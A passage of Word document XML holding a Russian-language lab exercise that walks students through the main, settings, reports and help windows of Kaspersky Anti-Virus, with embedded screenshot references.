        <w:t xml:space="preserve">чески, он состоит из четырех окон: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Главного окна</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, в котором можно управлять задачами и компоне</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тами антивируса. В нем также расположены ссылки на остальные окна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна настроек</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, предназначенного для настройки задач и комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нентов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна статистики и отчетов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, в котором можно получить данные о результатах работы антивируса </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна справочной системы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ходе выполнения задания нужно будет поочередно вызвать все четыре окна интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и ознакомиться с их внешним в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дом. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После успешного завершения процесса установки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Антивируса Касперского </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в системном меню </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск / Программы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> появляется новая группа - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. В ней содержится пять ярлыков, название каждого отражает смысл, например </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> открывает главное окно интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</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Откройте меню </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск / Программы / Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и озн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>комьтесь с его содержимым</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5052060" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="Рисунок 92" descr="http://www.intuit.ru/department/security/antiviruskasp/12/3-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intuit.ru/department/security/antiviruskasp/12/3-1sm.jpg"/>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5052060" cy="282702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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">О том, что </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в данный момент загружен и работает, символизирует иконка </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="152400" cy="152400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93" name="Рисунок 93" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-2.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215" r:link="rId2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E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на системной панели в правом нижнем углу экрана. В зависимости от задачи, выполняемой антивирусом, картинка на ней может меняться. В дальнейшем в ходе лабораторных работ во время выполн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ния разных задач всегда обращайте внимание на вид этой иконки.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Дополнительно она служит для быстрого доступа к основным функциям антивируса: двойной щелчок левой клавишей мыши на ней вызывает главное окно интерфейса, а контекстное меню, открываемое щелчком правой клавиши мыши позволяет сразу перейти на нужное окно интерфейса.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Откройте контекстное меню иконки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и озн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>комьтесь с представленным здесь списком ссылок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2217420" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="Рисунок 94" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-3.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId217" r:link="rId218">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2217420" cy="140208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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С помощью двойного щелчка на иконке откройте главное окно и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">терфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</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579620" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="Рисунок 95" descr="http://www.intuit.ru/department/security/antiviruskas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intuit.ru/department/security/antiviruskasp/12/3-4.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId220">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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В верхней правой части окна размещено две ссылки: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Справка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Первая используется для настройки антивируса, вторая - для вывода справочной системы.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Нажмите ссылку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Справка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открывшееся окно содержит руководство пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сом Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. При возникновении каких-либо проблем, в первую очередь всегда нужно обращаться к нему. Ознакомьтесь с содержанием справочной с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемы в левой панели окна и закрыв его вернитесь к главному окну антив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">руса </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3924300" cy="3208020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96" name="Рисунок 96" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-5.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId221" r:link="rId222">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3924300" cy="32080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rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В главном окне нажмите ссылку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, расположенную слева от </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Справка</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579620" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="Рисунок 97" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-6.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId223">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rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открывшееся окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> предназначено для настройки пар</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">метров работы антивируса. Изучите окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, пройдя по всем вкладкам. Нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Закрыть</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и вернитесь к главному окну интерфейса </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4008120" cy="3284220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98" name="Рисунок 98" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-7.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224" r:link="rId225">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rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Найдите элемент </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Защита</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, выделенный подчеркиванием (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685800" cy="220980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99" name="Рисунок 99" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-8.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId226" r:link="rId227">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="685800" cy="220980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, в левой части окна) и нажатием на нем правой клавишей мыши выведите ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">текстное меню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579620" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100" name="Рисунок 100" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/12/3-9.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219" r:link="rId228">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rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекстное меню разделено на две зоны: верхняя содержит ссылки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (открывает рассмотренное выше окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчет</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Ни</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">няя - кнопки управления работой защиты.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Для перехода к последнему из основных, четвертому окну, выберите ссылку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчет</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01" name="Рисунок 101" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-10.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId229" r:link="rId230">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rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ознакомьтесь с внешним видом этого окна и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Закрыть</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114800" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102" name="Рисунок 102" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/12/3-11.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
